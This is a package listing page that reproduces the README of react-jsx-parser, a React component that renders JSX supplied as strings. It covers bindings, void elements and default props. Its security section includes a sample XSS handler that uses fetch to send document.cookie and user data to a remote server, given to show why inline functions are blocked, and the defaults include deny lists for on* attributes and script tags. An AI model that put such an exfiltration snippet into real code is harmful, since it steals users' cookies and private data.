openbase logo
openbase logo
CategoriesLeaderboard
rjp

@zeit/react-jsx-parser

by Troy Alford
2.0.0 (see all)

A React component which can parse JSX and output rendered React Components.

npm
GitHub
CDN

Overview

DocumentationTutorialsReviewsMaintenanceDependenciesVersionsAlternatives
Showing:

Popularity

Downloads/wk

1.9K

GitHub Stars

478

Maintenance

Last Commit

2mos ago

Contributors

27

Package

Dependencies

1

License

MIT

Type Definitions

Not Found

Tree-Shakeable

No?

Categories

Reviews

Be the first to rate

Readme

react-jsx-parser CircleCI Version NPM Downloads License

A React component which can parse JSX and output rendered React Components.

Basic Usage - Injecting JSX as a String

import React from 'react'
import JsxParser from 'react-jsx-parser'
import Library from 'some-library-of-components'

class InjectableComponent extends Component {
  static defaultProps = {
    eventHandler: () => {}
  }
  // ... inner workings of InjectableComponent
}

const MyComponent = () => (
  <JsxParser
    bindings={{
      foo: 'bar',
      myEventHandler: () => { /* ... do stuff ... */ },
    }}
    components={{ InjectableComponent, Library }}
    jsx={`
      <h1>Header</h1>
      <InjectableComponent eventHandler={myEventHandler} truthyProp />
      <Library.SomeComponent someProp={foo} calc={1 + 1} stringProp="foo" />
      <Library.DataFetcher>((data) => <div>{data.name}</div>)</Library.DataFetcher>
    `}
  />
)

Because InjectableComponent is passed into the JsxParser.props.components prop, it is treated as a known element type, and created using React.createElement(...) when parsed out of the JSX. You can also pass in a whole collection of components, as shown by the Library binding, and then access the individual items with LibraryName.ComponentName.

Finally, a note about property bindings. The JsxParser can handle several types of binding:

  • implicit true bindings, such as <InjectableComponent truthyProp /> (equivalent to truthyProp={true})
  • string-value binding, such as stringProp="foo"
  • expression-binding, such as calc={1 + 1}
  • named-value binding, such as eventHandler={myEventHandler} (note that this requires a match in bindings)
  • simple single statement arrow expressions (item) => <p>{item.name}</p>

The component does not support inline function declarations, such as:

  • onClick={function (event) { /* do stuff */ }}, or
  • onKeyPress={event => { /* do stuff */}}
  • Function or arrow functions with bodies () => { return <p>This will not work</p> }

This is to prevent inadvertent XSS attack vectors. Since the primary use of this component is to allow JSX to be stored server-side, and then late-interpreted at the client-side, this restriction prevents a malicious user from stealing info by executing a situation like:

<JsxParser
  bindings={{ userInfo: { private: 'data' } }}
  onClick={() => {
    fetch('/some/remote/server', {
      body: JSON.stringify({ cookies: document.cookie, userInfo })
    })
  }}
/>

Advanced Usage - Injecting Dynamic JSX

// Import desired set of components
import { ComponentA, ComponentB } from 'somePackage/Components'
import ComponentC from 'somePackage/ComponentC'
import ComponentD from 'somePackage/ComponentD'
...
// Load an HTML or XML fragment from a remote API
const dynamicHtml = loadRemoteData()
...
// Within your component's render method, bind these components and the fragment as props
<JsxParser
  bindings={bindings}
  components={{ ComponentA, ComponentB, ComponentC, ComponentD }}
  jsx={dynamicHtml}
/>

Any ComponentA, ComponentB, ComponentC or ComponentD tags in the dynamically loaded XML/HTML fragment will be rendered as React components. Any unrecognized tags will be handled by React.

Note: Non-standard tags may throw errors and warnings, but will typically be rendered in a reasonable way.

Advanced Usage - HTML & Self-Closing Tags

When rendering HTML, standards-adherent editors will render img, hr, br, and other void elements with no trailing />. While this is valid HTML, it is not valid JSX. If you wish to opt-in to a more HTML-like parsing style, set the autoCloseVoidElements prop to true.

Example:

// <hr> has no closing tag, which is valid HTML, but not valid JSX
<JsxParser jsx="<hr><div className='foo'>Foo</div>" />
// Renders: null

// <hr></hr> is invalid HTML, but valid JSX
<JsxParser jsx="<hr></hr><div className='foo'>Foo</div>" />
// Renders: <hr><div class='foo'>Foo</div>

// This is valid HTML, and the `autoCloseVoidElements` prop allows it to render
<JsxParser autoCloseVoidElements jsx="<hr><div className='foo'>Foo</div>" />
// Renders: <hr><div class='foo'>Foo</div>

// This would work in a browser, but will no longer parse with `autoCloseVoidElements`
<JsxParser autoCloseVoidElements jsx="<hr></hr><div className='foo'>Foo</div>" />
// Renders: null

PropTypes / Settings

JsxParser.defaultProps = {
  allowUnknownElements: true, // by default, allow unrecognized elements
  // if false, unrecognized elements like <foo> are omitted and reported via onError

  autoCloseVoidElements: false, // by default, unclosed void elements will not parse. See examples

  bindings: {}, // by default, do not add any additional bindings

  blacklistedAttrs: [/^on.+/i], // default: removes `on*` attributes (onClick, onChange, etc.)
  // any attribute name which matches any of these RegExps will be omitted entirely

  blacklistedTags:  ['script'], // by default, removes all <script> tags

  className: '', // space-delimited classes to add to wrapper (ignored if renderInWrapper=false)

  components: {}, // an object map of component tag-names to their definitions - see above
  // components must extend React.Component, React.PureComponent, or be a Function

  componentsOnly: false, // non-component HTML tags are allowed by default, omitted if true

  disableFragments: false, // if true, React <Fragment />s will not be used.
  // Note: This introduces subtle errors with regard to white-space, and is provided only for
  // backward compatibility with React 15.x

  disableKeyGeneration: false, // if true, rendering will not automatically generate `key` props.
  // Note: This may result in the "Child elements should have a unique 'key' prop " React error.

  jsx: '', // the jsx string to be parsed & rendered

  onError: () => {}, // if specified, any rendering errors are reported via this method

  showWarnings: false, // if true showWarnings, rendering errors are output with console.warn

  renderError: undefined, // if specified, this function can be used to render errors as a fallback

  renderInWrapper: true, // if false, the HTML output will have no <div> wrapper

  renderUnrecognized: tagName => null, // unrecognized tags are rendered via this method
}

Older Browser Support

If your application needs to support older browsers, like IE11, import from react-jsx-parser/dist/es5/react-jsx-parser.min.js, which transpiles the acorn-jsx dependency down to ES5, and also adds additional polyfill support for code used in this package.

Note: not recommended for implementations which only support modern browsers, as the ES5 version is roughly 30% larger.

Rate & Review

Great Documentation0
Easy to Use0
Performant0
Highly Customizable0
Bleeding Edge0
Responsive Maintainers0
Poor Documentation0
Hard to Use0
Slow0
Buggy0
Abandoned0
Unwelcoming Community0
100
No reviews found
Be the first to rate

Alternatives

No alternatives found

Tutorials

No tutorials found
Add a tutorial